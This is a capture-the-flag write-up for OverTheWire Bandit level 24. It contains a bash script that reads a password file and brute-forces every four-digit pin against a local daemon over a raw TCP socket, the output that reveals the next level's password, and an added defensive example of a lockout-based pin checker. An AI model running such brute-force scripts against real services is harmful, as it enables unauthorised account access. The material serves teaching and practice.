Level 24
Log in to the server with bandit24 and the password.
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
This one took me a long time because I was having issues with timeouts for some reason. I opted to use bash's native TCP capabilities and wrote a script that would send all possible password and pin combinations, and then print all the responses, which could be filtered easily.
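```bash
#!/bin/bash
# Keep leading/trailing whitespace in lines read from the socket.
IFS=
# Open a read/write TCP connection to the daemon on file descriptor 4.
exec 4<>/dev/tcp/localhost/30002
# Read and print the daemon's greeting.
read -r -u4 line
echo "$line"
# Password of the current user (bandit24).
pass=$(< "/etc/bandit_pass/$(whoami)")
# Send every password/pin combination.
for pin in {0000..9999}; do
    echo "$pass $pin" >&4
done
# Read back the responses; stop once the daemon closes the connection.
for pin in {0000..9999}; do
    read -r -u4 line || break
    echo "$line"
done
```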
Then it was a simple matter of executing this script with uniq to get at the password.
```
bandit24@bandit:/tmp/234hktj3l4224k3jh$ bash test.sh | uniq
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Exiting.
bandit24@bandit:/tmp/234hktj3l4224k3jh$
```
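The sweep above finishes because the checker evaluates every line it is sent. As an added example (not the Bandit daemon's code and not part of the original write-up), here is a checker that caps failed guesses per source and then locks that source out; the class name, the limits and the sample password and pin are assumptions made for illustration.

```python
import hmac
import time


class PinChecker:
    """Hypothetical hardened pincode checker (illustrative, not the real daemon)."""

    def __init__(self, password, pin, max_failures=5, lockout_s=300,
                 clock=time.monotonic):
        self._expected = f"{password} {pin}".encode()
        self._max = max_failures      # assumed policy: failures before lockout
        self._lockout = lockout_s     # assumed policy: lockout length in seconds
        self._clock = clock
        self._state = {}              # source -> (failures, locked_until)

    def submit(self, source, line):
        """Evaluate one submitted line; return (reply, keep_connection_open)."""
        now = self._clock()
        failures, locked_until = self._state.get(source, (0, 0.0))
        if now < locked_until:
            # Refuse before comparing, so guesses sent during lockout leak nothing.
            return "Locked out. Exiting.", False
        # Constant-time comparison of the whole "password pin" line.
        if hmac.compare_digest(line.strip().encode(), self._expected):
            self._state.pop(source, None)
            return "Correct!", False
        failures += 1
        if failures >= self._max:
            self._state[source] = (0, now + self._lockout)
            return "Too many wrong attempts. Exiting.", False
        self._state[source] = (failures, locked_until)
        return "Wrong! Please enter the correct pincode. Try again.", True


def sweep(checker, source, password):
    """Replay the 0000-9999 sweep; return (guesses actually evaluated, found)."""
    evaluated = 0
    for n in range(10000):
        reply, _ = checker.submit(source, f"{password} {n:04d}")
        if not reply.startswith("Locked"):
            evaluated += 1
        if reply == "Correct!":
            return evaluated, True
    return evaluated, False


if __name__ == "__main__":
    frozen = lambda: 0.0  # constructed clock: the whole sweep happens "instantly"
    # Constructed credentials, not real Bandit values.
    print(sweep(PinChecker("constructed-pw", "7391", clock=frozen), "127.0.0.1", "constructed-pw"))
```

With the assumed limits of 5 failures per 300-second lockout, covering all 10000 pins from one source takes 2000 lockout windows, roughly a week instead of a single run.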